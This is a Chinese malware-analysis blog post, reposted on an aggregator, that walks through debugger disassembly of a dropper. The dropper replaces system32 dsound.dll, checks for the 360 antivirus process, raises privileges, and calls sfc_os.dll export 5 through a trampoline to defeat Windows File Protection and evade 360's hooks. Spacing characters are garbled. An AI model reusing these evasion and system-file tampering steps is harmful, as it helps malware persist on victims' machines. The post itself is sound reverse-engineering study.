00403FE9? |.? 50??????????? push eax????????????????????????????????? ; |pOffsetHi => NULL
00403FEA? |.? 50??????????? push eax????????????????????????????????? ; |OffsetLo => 0
00403FEB? |.? 53??????????? push ebx????????????????????????????????? ; |hFile
00403FEC? |.? FFD7????????? call edi????????????????????????????????? ; \SetFilePointer
00403FEE? |.? 8D45 EC?????? lea eax,[local.5]
00403FF1? |.? 6A 00???????? push 0x0????????????????????????????????? ; /pOverlapped = NULL
00403FF3? |.? 50??????????? push eax????????????????????????????????? ; |pBytesWritten
00403FF4? |.? FF76 04?????? push dword ptr ds:[esi+0x4]?????????????? ; |nBytesToWrite
00403FF7? |.? FF36????????? push dword ptr ds:[esi]?????????????????? ; |Buffer
00403FF9? |.? 53??????????? push ebx????????????????????????????????? ; |hFile
00403FFA? |.? FF15 1C504000 call dword ptr ds:[<&kernel32.WriteFile>] ; \WriteFile
接下來生成系統目錄\system\dsound.dll.****(隨機生成的)? 并且移動dsound.dll到dsound.dll.****
004044AE? |.? C645 DE 41??? mov byte ptr ss:[ebp-0x22],0x41?????? ;? MoveFileEx , CopyFile
004044B2? |.? 885D DF?????? mov byte ptr ss:[ebp-0x21],bl
004044B5? |.? FFD6????????? call esi
004044B7? |.? 50??????????? push eax
004044B8? |.? E8 63D4FFFF?? call Cracker.00401920
004044BD? |.? 59??????????? pop ecx
004044BE? |.? 8945 AC?????? mov [local.21],eax??????????????????? ;? [local.21] = Copyfile
004044C1? |.? 59??????????? pop ecx
004044C2? |.? 8D45 D4?????? lea eax,[local.11]
004044C5? |.? 50??????????? push eax
004044C6? |.? 57??????????? push edi
004044C7? |.? FFD6????????? call esi
004044C9? |.? 50??????????? push eax
004044CA? |.? E8 51D4FFFF?? call Cracker.00401920
004044CF? |.? 8945 08?????? mov [arg.1],eax?????????????????????? ;? [arg1] = MovefileEx
004044D2? |.? 8D85 94FDFFFF lea eax,[local.155]
004044D8? |.? 50??????????? push eax????????????????????????????? ;? C:\Windows\system32\dsound.dll
004044D9? |.? E8 E6D2FFFF?? call Cracker.004017C4
004044DE? |.? 83C4 0C?????? add esp,0xC
004044E1? |.? 85C0????????? test eax,eax
004044E3? |.? 0F84 87000000 je Cracker.00404570
004044E9? |.? 8D85 8CFBFFFF lea eax,[local.285]?????????????????? ;? C:\Windows\system32\dsound.dll.CNCL
004044EF? |.? 50??????????? push eax
004044F0? |.? E8 CFD2FFFF?? call Cracker.004017C4???????????????? ;? 判斷文件是否存在
接下來查看是否有360
004041AA? |.? C645 F4 33??? mov byte ptr ss:[ebp-0xC],0x33
004041AE? |.? C645 F5 36??? mov byte ptr ss:[ebp-0xB],0x36
004041B2? |.? C645 F6 30??? mov byte ptr ss:[ebp-0xA],0x30
004041B6? |.? C645 F7 74??? mov byte ptr ss:[ebp-0x9],0x74
004041BA? |.? C645 F8 72??? mov byte ptr ss:[ebp-0x8],0x72
004041BE? |.? C645 F9 61??? mov byte ptr ss:[ebp-0x7],0x61
004041C2? |.? C645 FA 79??? mov byte ptr ss:[ebp-0x6],0x79
004041C6? |.? C645 FB 2E??? mov byte ptr ss:[ebp-0x5],0x2E
004041CA? |.? C645 FC 65??? mov byte ptr ss:[ebp-0x4],0x65
004041CE? |.? C645 FD 78??? mov byte ptr ss:[ebp-0x3],0x78
004041D2? |.? C645 FE 65??? mov byte ptr ss:[ebp-0x2],0x65??????????? ;? 360tray.exe
004041D6? |.? E8 25CEFFFF?? call Cracker.00401000
call 401000 使用CreateToolhelp32Snapshot,Process32First,Process32Next 查看是否有360
跟進接下來一個call?? 這個call就是這個病毒怎么過360j檢測的
如果存在,則利用技巧躲避360的api調用檢查來調用sfc_os.dll5號函數,從而修改系統文件,躲過360.
00404069?? .? C645 DF 65??? mov byte ptr ss:[ebp-0x21],0x65
0040406D?? .? 8065 E0 00??? and byte ptr ss:[ebp-0x20],0x0??????? ;? SeDebugPrivilege
00404071?? .? 6A 01???????? push 0x1
00404073?? .? 8D45 D0?????? lea eax,dword ptr ss:[ebp-0x30]
00404076?? .? 50??????????? push eax
00404077?? .? E8 B3D3FFFF?? call Cracker.0040142F???????????????? ;? 提權
0040407C?? .? 59??????????? pop ecx
0040407D?? .? 59??????????? pop ecx
0040407E?? .? C645 E4 73??? mov byte ptr ss:[ebp-0x1C],0x73
00404082?? .? C645 E5 66??? mov byte ptr ss:[ebp-0x1B],0x66
00404086?? .? C645 E6 63??? mov byte ptr ss:[ebp-0x1A],0x63
0040408A?? .? C645 E7 5F??? mov byte ptr ss:[ebp-0x19],0x5F
0040408E?? .? C645 E8 6F??? mov byte ptr ss:[ebp-0x18],0x6F
00404092?? .? C645 E9 73??? mov byte ptr ss:[ebp-0x17],0x73
00404096?? .? C645 EA 2E??? mov byte ptr ss:[ebp-0x16],0x2E
0040409A?? .? C645 EB 64??? mov byte ptr ss:[ebp-0x15],0x64
0040409E?? .? C645 EC 6C??? mov byte ptr ss:[ebp-0x14],0x6C
004040A2?? .? C645 ED 6C??? mov byte ptr ss:[ebp-0x13],0x6C
004040A6?? .? 8065 EE 00??? and byte ptr ss:[ebp-0x12],0x0??????? ;? sfc_os.dll
004040AA?? .? 68 04010000?? push 0x104??????????????????????????? ; /n = 104 (260.)
004040AF?? .? 6A 00???????? push 0x0????????????????????????????? ; |c = 00
004040B1?? .? 68 2C634000?? push Cracker.0040632C???????????????? ; |s = Cracker.0040632C
004040B6?? .? E8 77070000?? call <jmp.&MSVCRT.memset>???????????? ; \memset
004040BB?? .? 83C4 0C?????? add esp,0xC
004040BE?? .? 68 82000000?? push 0x82???????????????????????????? ; /WideBufSize = 82 (130.)
004040C3?? .? 68 2C634000?? push Cracker.0040632C???????????????? ; |WideCharBuf = Cracker.0040632C
004040C8?? .? FF75 08?????? push dword ptr ss:[ebp+0x8]?????????? ; |/String
004040CB?? .? FF15 54504000 call dword ptr ds:[<&kernel32.lstrlen>; |\lstrlenA
004040D1?? .? 50??????????? push eax????????????????????????????? ; |StringSize
004040D2?? .? FF75 08?????? push dword ptr ss:[ebp+0x8]?????????? ; |StringToMap
004040D5?? .? 6A 00???????? push 0x0????????????????????????????? ; |Options = 0
004040D7?? .? 6A 00???????? push 0x0????????????????????????????? ; |CodePage = CP_ACP
004040D9?? .? FF15 08504000 call dword ptr ds:[<&kernel32.MultiBy>; \MultiByteToWideChar
004040DF?? .? 8D45 E4?????? lea eax,dword ptr ss:[ebp-0x1C]
004040E2?? .? 50??????????? push eax????????????????????????????? ; /FileName
004040E3?? .? FF15 00504000 call dword ptr ds:[<&kernel32.LoadLib>; \LoadLibraryA
004040E9?? .? 8945 F8?????? mov dword ptr ss:[ebp-0x8],eax??????? ;? LoadLirbary("scf_os.dll")
004040EC?? .? 837D F8 00??? cmp dword ptr ss:[ebp-0x8],0x0
004040F0?? .? 75 07???????? jnz XCracker.004040F9
004040F2?? .? 33C0????????? xor eax,eax
004040F4?? .? E9 9E000000?? jmp Cracker.00404197
004040F9?? >? 8365 F0 00??? and dword ptr ss:[ebp-0x10],0x0
004040FD?? .? 6A 05???????? push 0x5????????????????????????????? ;? 5
004040FF?? .? FF75 F8?????? push dword ptr ss:[ebp-0x8]?????????? ;? HMOdule
00404102?? .? E8 19D8FFFF?? call Cracker.00401920
00404107?? .? 59??????????? pop ecx?????????????????????????????? ;?? 獲取5號函數指針
00404108?? .? 59??????????? pop ecx
00404109?? .? 8945 F4?????? mov dword ptr ss:[ebp-0xC],eax
0040410C?? .? 8B45 F4?????? mov eax,dword ptr ss:[ebp-0xC]
0040410F?? .? 8945 FC?????? mov dword ptr ss:[ebp-0x4],eax
00404112?? .? 0FB605 286340>movzx eax,byte ptr ds:[0x406328]
00404119?? .? 83E0 01?????? and eax,0x1
0040411C?? .? 85C0????????? test eax,eax
0040411E?? .? 75 22???????? jnz XCracker.00404142
00404120?? .? A0 28634000?? mov al,byte ptr ds:[0x406328]
00404125?? .? 0C 01???????? or al,0x1
00404127?? .? A2 28634000?? mov byte ptr ds:[0x406328],al
0040412C?? .? 6A 0A???????? push 0xA????????????????????????????? ; /dwBytes = A (10.)
0040412E?? .? 6A 08???????? push 0x8????????????????????????????? ; |dwFlags = HEAP_ZERO_MEMORY
00404130?? .? FF15 50504000 call dword ptr ds:[<&kernel32.GetProc>; |[GetProcessHeap
00404136?? .? 50??????????? push eax????????????????????????????? ; |hHeap
00404137?? .? FF15 4C504000 call dword ptr ds:[<&kernel32.HeapAll>; \RtlAllocateHeap
0040413D?? .? A3 24634000?? mov dword ptr ds:[0x406324],eax?????? ;? 堆中分配10字節空間
00404142?? >? 6A 05???????? push 0x5????????????????????????????? ; /n = 5
00404144?? .? FF75 FC?????? push dword ptr ss:[ebp-0x4]?????????? ; | 復制5號函數的前5個字節內容到分配的堆空間中
00404147?? .? FF35 24634000 push dword ptr ds:[0x406324]????????? ; |dest = 00154808
0040414D?? .? E8 DA060000?? call <jmp.&MSVCRT.memcpy>???????????? ; \memcpy
00404152?? .? 83C4 0C?????? add esp,0xC
00404155?? .? A1 24634000?? mov eax,dword ptr ds:[0x406324]
0040415A?? .? C640 05 E9??? mov byte ptr ds:[eax+0x5],0xE9??????? ;? 覆蓋第6個字節 為 jmp
0040415E?? .? 8B45 FC?????? mov eax,dword ptr ss:[ebp-0x4]
00404161?? .? 2B05 24634000 sub eax,dword ptr ds:[0x406324]
00404167?? .? 83E8 05?????? sub eax,0x5?????????????????????????? ;? 計算jmp 地址
0040416A?? .? 8B0D 24634000 mov ecx,dword ptr ds:[0x406324]
00404170?? .? 8941 06?????? mov dword ptr ds:[ecx+0x6],eax??????? ;? 寫入jmp地址
00404173?? .? 6A FF???????? push -0x1
00404175?? .? 68 2C634000?? push Cracker.0040632C???????????????? ;? UNICODE "C:\WINDOWS\system32\dsound.dll"
0040417A?? .? 6A 00???????? push 0x0
0040417C?? .? E8 00000000?? call Cracker.00404181???????????????? ;? 下面四句計算返回地址40418C,并壓入棧
00404181?? $? 58??????????? pop eax
00404182?? .? 83C0 0B?????? add eax,0xB
00404185?? .? 50??????????? push eax
00404186?? .- FF25 24634000 jmp dword ptr ds:[0x406324]?????????? ;? 調轉到開辟10字節堆空間
0040418C?? .? FF75 F8?????? push dword ptr ss:[ebp-0x8]?????????? ; /hLibModule
0040418F?? .? FF15 48504000 call dword ptr ds:[<&kernel32.FreeLib>; \FreeLibrary
00404195?? .? 33C0????????? xor eax,eax
00404197?? >? 5F??????????? pop edi
00404198?? .? 5E??????????? pop esi
00404199?? .? 5B??????????? pop ebx
0040419A?? .? C9??????????? leave
0040419B?? .? C3??????????? retn
0040455B? |. /74 13???????? je XCracker.00404570
0040455D? |. |8D85 8CFBFFFF lea eax,[local.285]
00404563? |. |6A 01???????? push 0x1
00404565? |. |50??????????? push eax????????????????????????????? ;? C:\Windows\system32\dsound.dll.CNCL
00404566? |. |8D85 94FDFFFF lea eax,[local.155]
0040456C? |. |50??????????? push eax????????????????????????????? ;? C:\Windows\system32\dsound.dll
0040456D? |. |FF55 08?????? call [arg.1]????????????????????????? ;? MoveFileEx
00404570? |> \8D85 98FEFFFF lea eax,[local.90]
00404576? |.? 50??????????? push eax????????????????????????????? ;? C:\Windows\system32\DllCache\dsound.dll
到這里母體就差不多了,,,,看來還有一些主要的功能是在dll,,,改天再看了。洗洗睡覺。這次就不寫總結了,,,,,
轉載于:https://www.cnblogs.com/microzone/p/3247485.html
總結
以上是生活随笔為你收集整理的病毒汇编逆向分析实例赏析的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: loadrunner简介
- 下一篇: 了解NearPy,进行快速最近邻搜索